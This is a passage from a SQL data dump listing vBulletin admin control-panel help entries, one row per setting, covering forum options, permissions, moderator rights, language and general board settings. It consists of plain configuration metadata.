70, 1, 'vbulletin'), (3699, 'forum', 'add,edit', 'defaultsortfield', 72, 1, 'vbulletin'), (3700, 'forum', 'add,edit', 'defaultsortorder', 73, 1, 'vbulletin'), (3701, 'forum', 'add,edit', 'showprivate', 75, 1, 'vbulletin'), (3702, 'forum', 'add,edit', 'newpostemail', 80, 1, 'vbulletin'), (3703, 'forum', 'add,edit', 'newthreademail', 90, 1, 'vbulletin'), (3704, 'forum', 'add,edit', 'moderatenewpost', 100, 1, 'vbulletin'), (3705, 'forum', 'add,edit', 'moderatenewthread', 105, 1, 'vbulletin'), (3706, 'forum', 'add,edit', 'moderateattach', 110, 1, 'vbulletin'), (3707, 'forum', 'add,edit', 'styleid', 120, 1, 'vbulletin'), (3708, 'forum', 'add,edit', 'styleoverride', 130, 1, 'vbulletin'), (3709, 'forum', 'add,edit', 'imageprefix', 140, 1, 'vbulletin'), (3710, 'forum', 'add,edit', 'password', 150, 1, 'vbulletin'), (3711, 'forum', 'add,edit', 'canhavepassword', 170, 1, 'vbulletin'), (3712, 'forum', 'add,edit', 'cancontainthreads', 180, 1, 'vbulletin'), (3713, 'forum', 'add,edit', 'active', 190, 1, 'vbulletin'), (3714, 'forum', 'add,edit', 'allowposting', 200, 1, 'vbulletin'), (3715, 'forum', 'add,edit', 'indexposts', 210, 1, 'vbulletin'), (3716, 'forum', 'add,edit', 'allowhtml', 220, 1, 'vbulletin'), (3717, 'forum', 'add,edit', 'allowbbcode', 230, 1, 'vbulletin'), (3718, 'forum', 'add,edit', 'allowimages', 240, 1, 'vbulletin'), (3719, 'forum', 'add,edit', 'allowsmilies', 250, 1, 'vbulletin'), (3720, 'forum', 'add,edit', 'allowicons', 260, 1, 'vbulletin'), (3721, 'forum', 'add,edit', 'allowratings', 270, 1, 'vbulletin'), (3722, 'forum', 'add,edit', 'countposts', 280, 1, 'vbulletin'), (3723, 'forum', 'add,edit', 'showonforumjump', 290, 1, 'vbulletin'), (3724, 'forum', 'add,edit', 'prefixset', 300, 1, 'vbulletin'), (3725, 'forum', 'add,edit', 'prefixrequired', 310, 1, 'vbulletin'), (3726, 'forum', 'edit', '', 1, 1, 'vbulletin'), (3727, 'forum', 'edit', 'applypwdtochild', 160, 1, 'vbulletin'), (3728, 'forum', 'modify', '', 1, 1, 'vbulletin'), (3729, 'forum', 'podcast', 'author', 1, 1, 'vbulletin'), (3730, 'forum', 'podcast', 'categoryid', 1, 1, 'vbulletin'), (3731, 'forum', 'podcast', 'enabled', 1, 1, 'vbulletin'), (3732, 'forum', 'podcast', 'explicit', 1, 1, 'vbulletin'), (3733, 'forum', 'podcast', 'image', 1, 1, 'vbulletin'), (3734, 'forum', 'podcast', 'keywords', 1, 1, 'vbulletin'), (3735, 'forum', 'podcast', 'owneremail', 1, 1, 'vbulletin'), (3736, 'forum', 'podcast', 'ownername', 1, 1, 'vbulletin'), (3737, 'forum', 'podcast', 'subtitle', 1, 1, 'vbulletin'), (3738, 'forum', 'podcast', 'summary', 1, 1, 'vbulletin'), (3739, 'forum', 'remove', '', 1, 1, 'vbulletin'), (3740, 'forumpermission', '', '', 1, 1, 'vbulletin'), (3741, 'forumpermission', 'duplicate', '', 1, 1, 'vbulletin'), (3742, 'forumpermission', 'duplicate', 'ugid_from', 10, 1, 'vbulletin'), (3743, 'forumpermission', 'duplicate', 'usergrouplist', 20, 1, 'vbulletin'), (3744, 'forumpermission', 'duplicate', 'limitforumid', 30, 1, 'vbulletin'), (3745, 'forumpermission', 'duplicate', 'overwritedupes_group', 40, 1, 'vbulletin'), (3746, 'forumpermission', 'duplicate', 'overwriteinherited_group', 50, 1, 'vbulletin'), (3747, 'forumpermission', 'duplicate', 'forumid_from', 60, 1, 'vbulletin'), (3748, 'forumpermission', 'duplicate', 'forumlist', 70, 1, 'vbulletin'), (3749, 'forumpermission', 'duplicate', 'overwritedupes_forum', 80, 1, 'vbulletin'), (3750, 'forumpermission', 'duplicate', 'overwriteinherited_forum', 90, 1, 'vbulletin'), (3751, 'forumpermission', 'edit', '', 1, 1, 'vbulletin'), (3752, 'forumpermission', 'edit', 'canseethumbnails', 1, 1, 'vbulletin'), (3753, 'forumpermission', 'edit', 'mode', 20, 1, 'vbulletin'), (3754, 'forumpermission', 'edit,quickforum', 'canview', 30, 1, 'vbulletin'), (3755, 'forumpermission', 'edit,quickforum', 'canviewthreads', 35, 1, 'vbulletin'), (3756, 'forumpermission', 'edit,quickforum', 'canviewothers', 40, 1, 'vbulletin'), (3757, 'forumpermission', 'edit,quickforum', 'canseedelnotice', 45, 1, 'vbulletin'), (3758, 'forumpermission', 'edit,quickforum', 'cansearch', 50, 1, 'vbulletin'), (3759, 'forumpermission', 'edit,quickforum', 'canemail', 60, 1, 'vbulletin'), (3760, 'forumpermission', 'edit,quickforum', 'cangetattachment', 70, 1, 'vbulletin'), (3761, 'forumpermission', 'edit,quickforum', 'canpostnew', 80, 1, 'vbulletin'), (3762, 'forumpermission', 'edit,quickforum', 'canreplyown', 90, 1, 'vbulletin'), (3763, 'forumpermission', 'edit,quickforum', 'canreplyothers', 100, 1, 'vbulletin'), (3764, 'forumpermission', 'edit,quickforum', 'followforummoderation', 110, 1, 'vbulletin'), (3765, 'forumpermission', 'edit,quickforum', 'canpostattachment', 120, 1, 'vbulletin'), (3766, 'forumpermission', 'edit,quickforum', 'cantagown', 120, 1, 'vbulletin'), (3767, 'forumpermission', 'edit,quickforum', 'cantagothers', 130, 1, 'vbulletin'), (3768, 'forumpermission', 'edit,quickforum', 'candeletetagown', 140, 1, 'vbulletin'), (3769, 'forumpermission', 'edit,quickforum', 'canthreadrate', 140, 1, 'vbulletin'), (3770, 'forumpermission', 'edit,quickforum', 'caneditpost', 150, 1, 'vbulletin'), (3771, 'forumpermission', 'edit,quickforum', 'candeletepost', 160, 1, 'vbulletin'), (3772, 'forumpermission', 'edit,quickforum', 'canmove', 170, 1, 'vbulletin'), (3773, 'forumpermission', 'edit,quickforum', 'canopenclose', 180, 1, 'vbulletin'), (3774, 'forumpermission', 'edit,quickforum', 'candeletethread', 190, 1, 'vbulletin'), (3775, 'forumpermission', 'edit,quickforum', 'canpostpoll', 200, 1, 'vbulletin'), (3776, 'forumpermission', 'edit,quickforum', 'canvote', 220, 1, 'vbulletin'), (3777, 'forumpermission', 'modify', '', 1, 1, 'vbulletin'), (3778, 'forumpermission', 'quickedit', '', 1, 1, 'vbulletin'), (3779, 'forumpermission', 'quickeditor', '', 1, 1, 'vbulletin'), (3780, 'forumpermission', 'quickforum', '', 1, 1, 'vbulletin'), (3781, 'forumpermission', 'quickforum', 'forumid', 10, 1, 'vbulletin'), (3782, 'forumpermission', 'quickforum', 'usergrouplist', 20, 1, 'vbulletin'), (3783, 'help', 'edit', 'action', 1, 1, 'vbulletin'), (3784, 'help', 'edit', 'displayorder', 1, 1, 'vbulletin'), (3785, 'help', 'edit', 'optionname', 1, 1, 'vbulletin'), (3786, 'help', 'edit', 'product', 1, 1, 'vbulletin'), (3787, 'help', 'edit', 'script', 1, 1, 'vbulletin'), (3788, 'help', 'edit', 'text', 1, 1, 'vbulletin'), (3789, 'help', 'edit', 'title', 1, 1, 'vbulletin'), (3790, 'help', 'edit', 'volatile', 1, 1, 'vbulletin'), (3791, 'image', '', '', 1, 1, 'vbulletin'), (3792, 'image', 'add', '', 1, 1, 'vbulletin'), (3793, 'image', 'add', 'imagespath', 70, 1, 'vbulletin'), (3794, 'image', 'add', 'perpage', 80, 1, 'vbulletin'), (3795, 'image', 'add,edit,upload', 'title', 20, 1, 'vbulletin'), (3796, 'image', 'add,edit,upload', 'minimumposts', 30, 1, 'vbulletin'), (3797, 'image', 'add,edit,upload', 'smilietext', 30, 1, 'vbulletin'), (3798, 'image', 'add,edit,upload', 'path', 40, 1, 'vbulletin'), (3799, 'image', 'add,edit,upload', 'imagecategoryid', 50, 1, 'vbulletin'), (3800, 'image', 'add,edit,upload', 'displayorder', 60, 1, 'vbulletin'), (3801, 'image', 'addcategory', '', 1, 1, 'vbulletin'), (3802, 'image', 'addcategory,editcategory', 'title', 20, 1, 'vbulletin'), (3803, 'image', 'addcategory,editcategory', 'displayorder', 30, 1, 'vbulletin'), (3804, 'image', 'edit', '', 1, 1, 'vbulletin'), (3805, 'image', 'editcategory', '', 1, 1, 'vbulletin'), (3806, 'image', 'editpermissions', '', 1, 1, 'vbulletin'), (3807, 'image', 'modify', '', 1, 1, 'vbulletin'), (3808, 'image', 'remove', '', 1, 1, 'vbulletin'), (3809, 'image', 'removecategory', '', 1, 1, 'vbulletin'), (3810, 'image', 'upload', '', 1, 1, 'vbulletin'), (3811, 'image', 'upload', 'imagespath', 1, 1, 'vbulletin'), (3812, 'image', 'upload', 'upload', 1, 1, 'vbulletin'), (3813, 'image', 'upload', 'imagefile', 20, 1, 'vbulletin'), (3814, 'image', 'viewimages', '', 1, 1, 'vbulletin'), (3815, 'index', 'home', '', 1, 1, 'vbulletin'), (3816, 'language', '', '', 1, 1, 'vbulletin'), (3817, 'language', 'add', '', 1, 1, 'vbulletin'), (3818, 'language', 'add,edit_settings', 'title', 20, 1, 'vbulletin'), (3819, 'language', 'add,edit_settings', 'userselect', 30, 1, 'vbulletin'), (3820, 'language', 'add,edit_settings', 'direction', 50, 1, 'vbulletin'), (3821, 'language', 'add,edit_settings', 'languagecode', 60, 1, 'vbulletin'), (3822, 'language', 'add,edit_settings', 'charset', 70, 1, 'vbulletin'), (3823, 'language', 'add,edit_settings', 'imagesoverride', 80, 1, 'vbulletin'), (3824, 'language', 'add,edit_settings', 'locale', 90, 1, 'vbulletin'), (3825, 'language', 'add,edit_settings', 'dateoverride', 100, 1, 'vbulletin'), (3826, 'language', 'add,edit_settings', 'timeoverride', 110, 1, 'vbulletin'), (3827, 'language', 'add,edit_settings', 'registereddateoverride', 120, 1, 'vbulletin'), (3828, 'language', 'add,edit_settings', 'calformat1override', 130, 1, 'vbulletin'), (3829, 'language', 'add,edit_settings', 'calformat2override', 140, 1, 'vbulletin'), (3830, 'language', 'add,edit_settings', 'logdateoverride', 150, 1, 'vbulletin'), (3831, 'language', 'add,edit_settings', 'decimalsep', 160, 1, 'vbulletin'), (3832, 'language', 'add,edit_settings', 'thousandsep', 170, 1, 'vbulletin'), (3833, 'language', 'add,edit_settings', 'dirmark', 180, 1, 'vbulletin'), (3834, 'language', 'delete', '', 1, 1, 'vbulletin'), (3835, 'language', 'edit', '', 1, 1, 'vbulletin'), (3836, 'language', 'edit_settings', '', 1, 1, 'vbulletin'), (3837, 'language', 'edit_settings', 'isdefault', 40, 1, 'vbulletin'), (3838, 'language', 'files', '', 1, 1, 'vbulletin'), (3839, 'language', 'files', 'languageid', 10, 1, 'vbulletin'), (3840, 'language', 'files', 'product', 15, 1, 'vbulletin'), (3841, 'language', 'files', 'filename', 20, 1, 'vbulletin'), (3842, 'language', 'files', 'just_phrases', 30, 1, 'vbulletin'), (3843, 'language', 'files', 'languagefile', 40, 1, 'vbulletin'), (3844, 'language', 'files', 'serverfile', 50, 1, 'vbulletin'), (3845, 'language', 'files', 'olanguageid', 60, 1, 'vbulletin'), (3846, 'language', 'files', 'title', 70, 1, 'vbulletin'), (3847, 'language', 'files', 'anyversion', 80, 1, 'vbulletin'), (3848, 'language', 'modify', '', 1, 1, 'vbulletin'), (3849, 'language', 'rebuild', '', 1, 1, 'vbulletin'), (3850, 'misc', '', '', 1, 1, 'vbulletin'), (3851, 'misc', 'chooser', '', 1, 1, 'vbulletin'), (3852, 'misc', 'chooser', 'quality', 1, 1, 'vbulletin'), (3853, 'misc', 'chooser', 'perpage', 10, 1, 'vbulletin'), (3854, 'misc', 'chooser', 'startat', 20, 1, 'vbulletin'), (3855, 'misc', 'chooser', 'doprocess', 30, 1, 'vbulletin'), (3856, 'misc', 'chooser', 'autoredirect', 40, 1, 'vbulletin'), (3857, 'misc', 'chooser', 'install', 50, 1, 'vbulletin'), (3858, 'misc', 'chooser', 'renumber', 60, 1, 'vbulletin'), (3859, 'misc', 'chooser', 'reputation_base', 70, 1, 'vbulletin'), (3860, 'moderate', '', '', 1, 1, 'vbulletin'), (3861, 'moderate', 'attachments', '', 1, 1, 'vbulletin'), (3862, 'moderate', 'attachments', 'attachaction', 10, 1, 'vbulletin'), (3863, 'moderate', 'events', '', 1, 1, 'vbulletin'), (3864, 'moderate', 'events', 'eventsubject', 10, 1, 'vbulletin'), (3865, 'moderate', 'events', 'eventtext', 20, 1, 'vbulletin'), (3866, 'moderate', 'events', 'eventaction', 30, 1, 'vbulletin'), (3867, 'moderate', 'posts', '', 1, 1, 'vbulletin'), (3868, 'moderate', 'posts', 'threadtitle', 10, 1, 'vbulletin'), (3869, 'moderate', 'posts', 'threadpagetext', 20, 1, 'vbulletin'), (3870, 'moderate', 'posts', 'threadnotes', 30, 1, 'vbulletin'), (3871, 'moderate', 'posts', 'threadaction', 40, 1, 'vbulletin'), (3872, 'moderate', 'posts', 'posttitle', 50, 1, 'vbulletin'), (3873, 'moderate', 'posts', 'postpagetext', 60, 1, 'vbulletin'), (3874, 'moderate', 'posts', 'postaction', 70, 1, 'vbulletin'), (3875, 'moderator', '', '', 1, 1, 'vbulletin'), (3876, 'moderator', 'add', '', 1, 1, 'vbulletin'), (3877, 'moderator', 'add', 'usergroupid', 30, 1, 'vbulletin'), (3878, 'moderator', 'add', 'membergroupids', 40, 1, 'vbulletin'), (3879, 'moderator', 'add,edit', 'forumid', 10, 1, 'vbulletin'), (3880, 'moderator', 'add,edit', 'modusername', 20, 1, 'vbulletin'), (3881, 'moderator', 'add,edit,editglobal', 'candeletealbumpicture', 1, 1, 'vbulletin'), (3882, 'moderator', 'add,edit,editglobal', 'candeletepicturecomments', 1, 1, 'vbulletin'), (3883, 'moderator', 'add,edit,editglobal', 'caneditpicturecomments', 1, 1, 'vbulletin'), (3884, 'moderator', 'add,edit,editglobal', 'canmoderatepicturecomments', 1, 1, 'vbulletin'), (3885, 'moderator', 'add,edit,editglobal', 'canmoderatepictures', 1, 1, 'vbulletin'), (3886, 'moderator', 'add,edit,editglobal', 'canremovepicturecomments', 1, 1, 'vbulletin'), (3887, 'moderator', 'add,edit,editglobal', 'caneditposts', 50, 1, 'vbulletin'), (3888, 'moderator', 'add,edit,editglobal', 'candeleteposts', 60, 1, 'vbulletin'), (3889, 'moderator', 'add,edit,editglobal', 'canremoveposts', 70, 1, 'vbulletin'), (3890, 'moderator', 'add,edit,editglobal', 'canopenclose', 80, 1, 'vbulletin'), (3891, 'moderator', 'add,edit,editglobal', 'caneditthreads', 90, 1, 'vbulletin'), (3892, 'moderator', 'add,edit,editglobal', 'canmanagethreads', 100, 1, 'vbulletin'), (3893, 'moderator', 'add,edit,editglobal', 'caneditpoll', 110, 1, 'vbulletin'), (3894, 'moderator', 'add,edit,editglobal', 'canannounce', 120, 1, 'vbulletin'), (3895, 'moderator', 'add,edit,editglobal', 'canmoderateposts', 130, 1, 'vbulletin'), (3896, 'moderator', 'add,edit,editglobal', 'canmoderateattachments', 140, 1, 'vbulletin'), (3897, 'moderator', 'add,edit,editglobal', 'canmassmove', 150, 1, 'vbulletin'), (3898, 'moderator', 'add,edit,editglobal', 'canmassprune', 160, 1, 'vbulletin'), (3899, 'moderator', 'add,edit,editglobal', 'cansetpassword', 170, 1, 'vbulletin'), (3900, 'moderator', 'add,edit,editglobal', 'canviewips', 180, 1, 'vbulletin'), (3901, 'moderator', 'add,edit,editglobal', 'canviewprofile', 190, 1, 'vbulletin'), (3902, 'moderator', 'add,edit,editglobal', 'canbanusers', 200, 1, 'vbulletin'), (3903, 'moderator', 'add,edit,editglobal', 'canunbanusers', 210, 1, 'vbulletin'), (3904, 'moderator', 'add,edit,editglobal', 'caneditsigs', 220, 1, 'vbulletin'), (3905, 'moderator', 'add,edit,editglobal', 'caneditavatar', 230, 1, 'vbulletin'), (3906, 'moderator', 'add,edit,editglobal', 'caneditprofilepic', 240, 1, 'vbulletin'), (3907, 'moderator', 'add,edit,editglobal', 'caneditreputation', 250, 1, 'vbulletin'), (3908, 'moderator', 'add,edit,editglobal', 'newthreademail', 260, 1, 'vbulletin'), (3909, 'moderator', 'add,edit,editglobal', 'newpostemail', 270, 1, 'vbulletin'), (3910, 'moderator', 'add,edit,editglobal', 'caneditvisitormessages', 300, 1, 'vbulletin'), (3911, 'moderator', 'add,edit,editglobal', 'candeletevisitormessages', 310, 1, 'vbulletin'), (3912, 'moderator', 'add,edit,editglobal', 'canremovevisitormessages', 320, 1, 'vbulletin'), (3913, 'moderator', 'add,edit,editglobal', 'canmoderatevisitormessages', 330, 1, 'vbulletin'), (3914, 'moderator', 'add,edit,editglobal', 'caneditsocialgroups', 350, 1, 'vbulletin'), (3915, 'moderator', 'add,edit,editglobal', 'candeletesocialgroups', 360, 1, 'vbulletin'), (3916, 'moderator', 'add,edit,editglobal', 'caneditgroupmessages', 370, 1, 'vbulletin'), (3917, 'moderator', 'add,edit,editglobal', 'candeletegroupmessages', 380, 1, 'vbulletin'), (3918, 'moderator', 'add,edit,editglobal', 'canremovegroupmessages', 390, 1, 'vbulletin'), (3919, 'moderator', 'add,edit,editglobal', 'canmoderategroupmessages', 400, 1, 'vbulletin'), (3920, 'moderator', 'add,edit,editglobal', 'caneditalbumpicture', 450, 1, 'vbulletin'), (3921, 'moderator', 'edit', '', 1, 1, 'vbulletin'), (3922, 'moderator', 'edit', 'candeletediscussions', 1, 1, 'vbulletin'), (3923, 'moderator', 'edit', 'caneditdiscussions', 1, 1, 'vbulletin'), (3924, 'moderator', 'edit', 'canmoderatediscussions', 1, 1, 'vbulletin'), (3925, 'moderator', 'edit', 'canremovediscussions', 1, 1, 'vbulletin'), (3926, 'moderator', 'editglobal', 'candeletediscussions', 1, 1, 'vbulletin'), (3927, 'moderator', 'editglobal', 'caneditdiscussions', 1, 1, 'vbulletin'), (3928, 'moderator', 'editglobal', 'canmoderatediscussions', 1, 1, 'vbulletin'), (3929, 'moderator', 'editglobal', 'canremovediscussions', 1, 1, 'vbulletin'), (3930, 'moderator', 'editglobal', 'cantransfersocialgroups', 1, 1, 'vbulletin'), (3931, 'moderator', 'remove', '', 1, 1, 'vbulletin'), (3932, 'moderator', 'removeall', '', 1, 1, 'vbulletin'), (3933, 'moderator', 'showlist', '', 1, 1, 'vbulletin'), (3934, 'modlog', '', '', 1, 1, 'vbulletin'), (3935, 'modlog', 'choose', '', 1, 1, 'vbulletin'), (3936, 'modlog', 'choose', 'perpage', 10, 1, 'vbulletin'), (3937, 'modlog', 'choose', 'userid', 20, 1, 'vbulletin'), (3938, 'modlog', 'choose', 'orderby', 30, 1, 'vbulletin'), (3939, 'modlog', 'choose', 'daysprune', 40, 1, 'vbulletin'), (3940, 'modlog', 'prunelog', '', 1, 1, 'vbulletin'), (3941, 'modlog', 'view', '', 1, 1, 'vbulletin'), (3942, 'notice', 'add,edit', 'title', 1, 1, 'vbulletin'), (3943, 'notice', 'add,edit', 'html', 4, 1, 'vbulletin'), (3944, 'notice', 'add,edit', 'displayorder', 6, 1, 'vbulletin'), (3945, 'notice', 'add,edit', 'active', 8, 1, 'vbulletin'), (3946, 'notice', 'add,edit', 'persistent', 10, 1, 'vbulletin'), (3947, 'notice', 'add,edit', 'criteria', 20, 1, 'vbulletin'), (3948, 'notice', 'modify', 'tableheader', 1, 1, 'vbulletin'), (3949, 'options', '', '', 1, 1, 'vbulletin'), (3950, 'options', 'options', '', 1, 1, 'vbulletin'), (3951, 'options', 'options', 'albums_perpage', 1, 1, 'vbulletin'), (3952, 'options', 'options', 'albums_pictures_moderation', 1, 1, 'vbulletin'), (3953, 'options', 'options', 'album_captionpreviewlen', 1, 1, 'vbulletin'), (3954, 'options', 'options', 'album_maxpicsperalbum', 1, 1, 'vbulletin'), (3955, 'options', 'options', 'album_pictures_perpage', 1, 1, 'vbulletin'), (3956, 'options', 'options', 'album_recentalbumdays', 1, 1, 'vbulletin'), (3957, 'options', 'options', 'album_thumbsize', 1, 1, 'vbulletin'), (3958, 'options', 'options', 'album_uploadamount', 1, 1, 'vbulletin'), (3959, 'options', 'options', 'attachresize', 1, 1, 'vbulletin'), (3960, 'options', 'options', 'bounceemail', 1, 1, 'vbulletin'), (3961, 'options', 'options', 'checkcoppa', 1, 1, 'vbulletin'), (3962, 'options', 'options', 'errorlogemail', 1, 1, 'vbulletin'), (3963, 'options', 'options', 'externalcache', 1, 1, 'vbulletin'), (3964, 'options', 'options', 'externalcount', 1, 1, 'vbulletin'), (3965, 'options', 'options', 'gm_maxperpage', 1, 1, 'vbulletin'), (3966, 'options', 'options', 'gm_perpage', 1, 1, 'vbulletin'), (3967, 'options', 'options', 'hvcheck', 1, 1, 'vbulletin'), (3968, 'options', 'options', 'ie8render7', 1, 1, 'vbulletin'), (3969, 'options', 'options', 'ipcheck', 1, 1, 'vbulletin'), (3970, 'options', 'options', 'paymentemail', 1, 1, 'vbulletin'), (3971, 'options', 'options', 'pc_allowed_bbcode', 1, 1, 'vbulletin'), (3972, 'options', 'options', 'pc_enabled', 1, 1, 'vbulletin'), (3973, 'options', 'options', 'pc_maxperpage', 1, 1, 'vbulletin'), (3974, 'options', 'options', 'pc_moderation', 1, 1, 'vbulletin'), (3975, 'options', 'options', 'pc_perpage', 1, 1, 'vbulletin'), (3976, 'options', 'options', 'pmthrottleperiod', 1, 1, 'vbulletin'), (3977, 'options', 'options', 'postedithistory', 1, 1, 'vbulletin'), (3978, 'options', 'options', 'postimagecheck', 1, 1, 'vbulletin'), (3979, 'options', 'options', 'profileprivacy', 1, 1, 'vbulletin'), (3980, 'options', 'options', 'profile_album_amount', 1, 1, 'vbulletin'), (3981, 'options', 'options', 'remoteyui', 1, 1, 'vbulletin'), (3982, 'options', 'options', 'rpemail', 1, 1, 'vbulletin'), (3983, 'options', 'options', 'rpforumid', 1, 1, 'vbulletin'), (3984, 'options', 'options', 'rpuserid', 1, 1, 'vbulletin'), (3985, 'options', 'options', 'sgd_maxperpage', 1, 1, 'vbulletin'), (3986, 'options', 'options', 'sgd_perpage', 1, 1, 'vbulletin'), (3987, 'options', 'options', 'sg_allowed_bbcode', 1, 1, 'vbulletin'), (3988, 'options', 'options', 'sg_allow_delete_empty_group', 1, 1, 'vbulletin'), (3989, 'options', 'options', 'sg_allow_join_to_view', 1, 1, 'vbulletin'), (3990, 'options', 'options', 'sg_allow_owner_mod_queue', 1, 1, 'vbulletin'), (3991, 'options', 'options', 'sg_category_cloud_size', 1, 1, 'vbulletin'), (3992, 'options', 'options', 'sg_enablesocialgroupicons', 1, 1, 'vbulletin'), (3993, 'options', 'options', 'sg_enable_owner_only_discussions', 1, 1, 'vbulletin'), (3994, 'options', 'options', 'sg_maxperpage', 1, 1, 'vbulletin'), (3995, 'options', 'options', 'sg_name_maxchars', 1, 1, 'vbulletin'), (3996, 'options', 'options', 'sg_newgroups_count', 1, 1, 'vbulletin'), (3997, 'options', 'options', 'sg_perpage', 1, 1, 'vbulletin'), (3998, 'options', 'options', 'skypeweb_gfx', 1, 1, 'vbulletin'), (3999, 'options', 'options', 'socialbookmarks', 1, 1, 'vbulletin'), (4000, 'options', 'options', 'socnet', 1, 1, 'vbulletin'), (4001, 'options', 'options', 'tagbadwords', 1, 1, 'vbulletin'), (4002, 'options', 'options', 'tagcloud_cachetime', 1, 1, 'vbulletin'), (4003, 'options', 'options', 'tagcloud_levels', 1, 1, 'vbulletin'), (4004, 'options', 'options', 'tagcloud_searchcloud', 1, 1, 'vbulletin'), (4005, 'options', 'options', 'tagcloud_searchhistory', 1, 1, 'vbulletin'), (4006, 'options', 'options', 'tagcloud_tags', 1, 1, 'vbulletin'), (4007, 'options', 'options', 'tagcloud_usagehistory', 1, 1, 'vbulletin'), (4008, 'options', 'options', 'tagcloud_usergroup', 1, 1, 'vbulletin'), (4009, 'options', 'options', 'tagdelimiter', 1, 1, 'vbulletin'), (4010, 'options', 'options', 'taggoodwords', 1, 1, 'vbulletin'), (4011, 'options', 'options', 'tagminlen', 1, 1, 'vbulletin'), (4012, 'options', 'options', 'thumbcolor', 1, 1, 'vbulletin'), (4013, 'options', 'options', 'tosurl', 1, 1, 'vbulletin'), (4014, 'options', 'options', 'uiforumid', 1, 1, 'vbulletin'), (4015, 'options', 'options', 'uimessage', 1, 1, 'vbulletin'), (4016, 'options', 'options', 'usercss_allowed_fonts', 1, 1, 'vbulletin'), (4017, 'options', 'options', 'usercss_allowed_padding', 1, 1, 'vbulletin'), (4018, 'options', 'options', 'vm_allowed_bbcode', 1, 1, 'vbulletin'), (4019, 'options', 'options', 'welcomepm', 1, 1, 'vbulletin'), (4020, 'options', 'options', 'rsspodcast', 1, 1, 'vbulletin'), (4021, 'options', 'options', 'socnet_groups_msg_enabled', 10, 1, 'vbulletin'), (4022, 'options', 'options', 'vb_antispam_key', 10, 1, 'vbulletin'), (4023, 'options', 'options', 'bbactive', 20, 1, 'vbulletin'), (4024, 'options', 'options', 'socnet_groups_albums_enabled', 20, 1, 'vbulletin'), (4025, 'options', 'options', 'vb_antispam_posts', 20, 1, 'vbulletin'), (4026, 'options', 'options', 'bbclosedreason', 30, 1, 'vbulletin'), (4027, 'options', 'options', 'bbtitle', 40, 1, 'vbulletin'), (4028, 'options', 'options', 'bburl', 50, 1, 'vbulletin'), (4029, 'options', 'options', 'hometitle', 60, 1, 'vbulletin'), (4030, 'options', 'options', 'homeurl', 70, 1, 'vbulletin'), (4031, 'options', 'options', 'contactuslink', 80, 1, 'vbulletin'), (4032, 'options', 'options', 'contactustype', 85, 1, 'vbulletin'), (4033, 'options', 'options', 'contactusoptions', 90, 1, 'vbulletin'), (4034, 'options', 'options', 'lightboxenabled', 100, 1, 'vbulletin'), (4035, 'options', 'options', 'webmasteremail', 100, 1, 'vbulletin'), (4036, 'options', 'options', 'privacyurl', 110, 1, 'vbulletin'), (4037, 'options', 'options', 'copyrighttext', 120, 1, 'vbulletin'), (4038, 'options', 'options', 'companyname', 130, 1, 'vbulletin'), (4039, 'options', 'options', 'faxnumber', 140, 1, 'vbulletin'), (4040, 'options', 'options', 'address', 160, 1, 'vbulletin'), (4041, 'options', 'options', 'keywords', 170, 1, 'vbulletin'), (4042, 'options', 'options', 'description', 180, 1, 'vbulletin'), (4043, 'options', 'options', 'useforumjump', 190, 1, 'vbulletin'), (4044, 'options', 'options', 'pagenavpages', 200, 1, 'vbulletin'), (4045, 'options', 'options', 'pagenavs', 205, 1, 'vbulletin'), (4046, 'options', 'options', 'enableaccess', 210, 1, 'vbulletin'), (4047, 'options', 'options', 'showimicons', 220, 1, 'vbulletin'), (4048, 'options', 'options', 'addtemplatename', 230, 1, 'vbulletin'), (4049, 'options', 'options', 'usestrikesystem', 235, 1, 'vbulletin'), (4050, 'options', 'options', 'forumleaders', 236, 1, 'vbulletin'), (4051, 'options', 'options', 'allowedreferrers', 237, 1, 'vbulletin'), (4052, 'options', 'options', 'threadmarking', 238, 1, 'vbulletin'), (4053, 'options', 'options', 'disable_ajax', 239, 1, 'vbulletin'), (4054, 'options', 'options', 'enable_inlinemod_auth', 239, 1, 'vbulletin'), (4055, 'options', 'options', 'markinglimit', 239, 1, 'vbulletin'), (4056, 'options', 'options', 'threadtagging', 240, 1, 'vbulletin'), (4057, 'options', 'options', 'yestoday', 240, 1, 'vbulletin'), (4058, 'options', 'options', 'tagmaxlen', 241, 1, 'vbulletin'), (4059, 'options', 'options', 'tagmaxstarter', 242, 1, 'vbulletin'), (4060, 'options', 'options', 'tagmaxthread', 242, 1, 'vbulletin'), (4061, 'options', 'options', 'tagmaxuser', 244, 1, 'vbulletin'), (4062, 'options', 'options', 'tagforcelower', 245, 1, 'vbulletin'), (4063, 'options', 'options', 'timeoffset', 250, 1, 'vbulletin'), (4064, 'options', 'options', 'dstonoff', 260, 1, 'vbulletin'), (4065, 'options', 'options', 'dateformat', 270, 1, 'vbulletin'), (4066, 'options', 'options', 'timeformat', 280, 1, 'vbulletin'), (4067, 'options', 'options', 'registereddateformat', 290, 1, 'vbulletin'), (4068, 'options', 'options', 'calformat1', 300, 1, 'vbulletin'), (4069, 'options', 'options', 'calformat2', 310, 1, 'vbulletin'), (4070, 'options', 'options', 'logdateformat', 315, 1, 'vbulletin'), (4071, 'options', 'options', 'cookietimeout', 320, 1, 'vbulletin'), (4072, 'options', 'options', 'cookiepath', 330, 1, 'vbulletin'), (4073, 'options', 'options', 'cookiedomain', 340, 1, 'vbulletin'), (4074, 'options', 'options', 'gzipoutput', 350, 1, 'vbulletin'), (4075, 'options', 'options', 'gziplevel', 360, 1, 'vbulletin'), (4076, 'options', 'options', 'addheaders', 370, 1, 'vbulletin'), (4077, 'options', 'options', 'nocacheheaders', 375, 1, 'vbulletin'), (4078, 'options', 'options', 'useheaderredirect', 380, 1, 'vbulletin'), (4079, 'options', 'options', 'allowphpinfo', 390, 1, 'vbulletin'), (4080, 'options', 'options', 'cachemaxage', 400, 1, 'vbulletin'), (4081, 'options', 'options', 'threadviewslive', 410, 1, 'vbulletin'), (4082, 'options', 'options', 'attachmentviewslive', 420, 1, 'vbulletin'), (4083, 'options', 'options', 'emailsendnum', 430, 1, 'vbulletin'), (4084, 'options', 'options', 'loadlimit', 450, 1, 'vbulletin'), (4085, 'options', 'options', 'imagetype', 461, 1, 'vbulletin'), (4086, 'options', 'options', 'regimagetype', 462, 1, 'vbulletin'), (4087, 'options', 'options', 'magickpath', 464, 1, 'vbulletin'), (4088, 'options', 'options', 'regimageoption', 465, 1, 'vbulletin'), (4089, 'options', 'options', 'safeupload', 480, 1, 'vbulletin'), (4090, 'options', 'options', 'tmppath', 490, 1, 'vbulletin'), (4091, 'options', 'options', 'copypostindex', 493, 1, 'vbulletin'), (4092, 'options', 'options', 'usemailqueue', 500, 1, 'vbulletin'), (4093, 'options', 'options', 